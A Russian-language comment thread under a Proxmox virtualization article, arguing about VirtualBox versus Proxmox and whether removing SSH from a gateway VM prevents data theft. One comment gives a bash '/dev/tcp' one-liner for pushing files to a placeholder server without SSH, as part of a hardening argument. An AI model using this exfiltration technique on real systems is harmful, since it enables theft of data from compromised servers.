Pull to refresh

Comments 22

Правильно я понимаю, что это аналог VirtualBox? В целом не очень понял прикладного значения такого действа.
На моей памяти еще никто так не оскорблял proxmox :)
Замечательное получилось сравнение )
Сравнение хоть и некорректное, но в принципе имеет право на существование. phpVirtualBox простое решение для низконагруженых серверов. Ставил посмотреть на это в качестве эксперимента, но потом оставил в продакшене. Достаточно удобно и просто администрируется. Но потери в производительности видны невооруженным глазом, так что в датацентрах использование VirtualBox будет очень плохой идеей.
Думаю тут нужно сперва ответить себе на вопрос, а зачем же вообще нужна виртуализация?
На этой виртуальной машине не будет SSH или других ненужных служб, если ее каким-то образом взломают, то не смогут получить доступ к вашим данным

А как ее предполагается, что могут взломать и при этом не получить доступ? Я думал, что взлом сервера это обычно все-таки получение шелла, после которого уже все равно, какие пакеты у вас стоят, а какие нет. Плюс к тому атаковать будут скорее те машины, которые стоят за шлюзом и на которые прокинуты порты, у вас же никакой защиты там нет на фильтрацию трафика. Почти прямой трафик до сервера, можно брутить пароли на почтовик, например, или заливать php-шелл через дыру в апаче, который расположен за шлюзом.
Тут скорее вопрос в том, чтобы не ставить на шлюз те сервисы, которые реально не будут использоваться, но это вообще должно относиться к любым боевым серверам. И кроме удаления всего ненужного я бы рекомендовал еще посмотреть список сервисов, которые на этой машине запущены и работают. Хостеры зачастую включают SASL, например, который на шлюзе не нужен. Вообще, харденинг — это отдельная тема, которая не ограничивается удалением пакетов (вот вам тема для будущей статьи ;-))
У вас есть два адреса: (допустим)
5.5.5.5 и 5.6.6.6
Ваш сайт мойсайт.рф находится на адресе 5.6.6.6
Злоумышленнык делает nmap адреса 5.6.6.6 и обнаруживает там лишь 80-ый и 443 порт, ни 22 и 21 и 53, 25,110 видны не будут
те он не может попасть на этот сервер
допустим это случилось и он это сделал, тогда он попадает на голую систему без ничего вообще
Ваши данные и службы находятся на других виртуальных машинах этого сервера, так же без SSH
Те единственный способ взломать ваш сервер это выйти из уровня изоляции ваших виртуальных машин, открытых багов на эту тему нет и нужно следить за своевремееным обновлением гипервизора
В вашем примере он попадет на систему, на которой просто пакетов установленных нет. Но он попадет в систему с пакетным менеджером.
Сниффер поставить на шлюз — отличный вариант, на шлюзе самое то. И без доступа к удаленным машинам есть вариант получить много полезной информации. Ну и инжекции в трафик теоретически. Плюс анализ активности по вашим логам.
Вы не думайте, я не сомневаюсь, что вы профессионал, но тема действительно не очень раскрыта.
во первых как он попадет на сервер в принципе? нет портов по которым он мог бы подключиться
Во вторых, что он сможет сделать снифером? в серой сети нет никакого секретного трафика, пароли к mysql? mysql авторизует по имя%адрес?
утянуть файлы? как без ssh,  ftp и прочего?
Мне кажется ваши опасания мягко говоря затянуты за уши
Про попадение на сервер — у вас в статье. Это не мои опасения, это не нужная в принципе фраза в статье, о которой я спросил, к чему она:
На этой виртуальной машине не будет SSH или других ненужных служб, если ее каким-то образом взломают, то не смогут получить доступ к вашим данным

Если ее взломают, то доступ получат. Трафик нужен не тот, который у вас во внутренней сети, он вообще через шлюз ходить не должен, а тот, который пойдет извне, с которым работают пользователи.
Вы просто лишнее предложение написали с опасением. Не то, чтобы я придираюсь, просто сказали «А», говорите и «Б», либо не говорите и «А». Если никаких ненужных сервисов нет, то вероятность взлома очень низкая, если вы не какая-нибудь система, обрабатывающая персональные данные и кредитные карты.
Файлы можно слить прямо через bash, он отлично работает с tcp.
Мне кажется ваши опасания мягко говоря затянуты за уши

Разве что самую малость. Я скорее придрался немного к «удаляем несколько пакетов, и тот, кто попал на сервер, ничего сделать не сможет».
без ssh они не попадут на сервер, все личные данные под ssl обычно, у вас есть сведения что ssl легко расшифровать просто находясь в той же сети что и получатель ssl пакетов?
Ну, и опять же возвращаемся к вопросу «Каким образом систему можно взломать?», вы себе противоречите. Уберите лучше из статьи слова про «если взломают».
Конечно у меня нет таких сведений, я же не АНБ, да, это нелегко. Без реального серверного сертификата и ключа вы даже MITM не реализуете. Если они есть, то sslsniff вам в руки, может и получится чего. Очень неаккуратно вы выражаетесь. Шлюз у вас не просто «находится в сети», через него весь трафик идет.
Вообще мы можем тут в каментах очень долго общаться, но это таки оффтоп, поэтому давайте больше не будем :) Статья про Proxmox, а не про безопасность и дыры в ней. Жду вашей следующей статьи.
Наш сервер на котором находится внешний адрес это просто хост-фаервол
файлы находятся на другом сервере куда проброшен порт 80
как не имея на файловом сервере ssh сервера вы сольете файлы через  bash?
SCP (от англ. secure copy) — протокол RCP копирования файлов, использующий в качестве транспорта не RSH, а SSH
те без ssh сервера это работат не будет, так же как и sftp и rsync через ssh
Ты не понимаешь. Получив веб-шелл на сервере через уязвимость в веб-приложении или веб-сервере, можно дальше делать что угодно, независимо от наличия ssh-сервера на этом хосте.
мы говорим о серверной инфраструктуре
о том как обезопасить наши web приложения я напишу позже
но сразу скажу технология jailkit и suEXEC спасет мир
Если на файловом сервере есть bash, то с него можно легко слить всё, что угодно, даже если там нет ssh-клиента и ssh-сервера.
Я намекну
exec 3<>/dev/tcp/ftpserver/<порт>
И потом просто описываете протокол и выводите данные в соответствующий дескриптор. Ни SSH-клиент, ни SSH-сервер тут не нужны. Но для этого, естественно, надо иметь шелл на сервере, который получить заметно тяжелее
Only those users with full accounts are able to leave comments. Log in, please.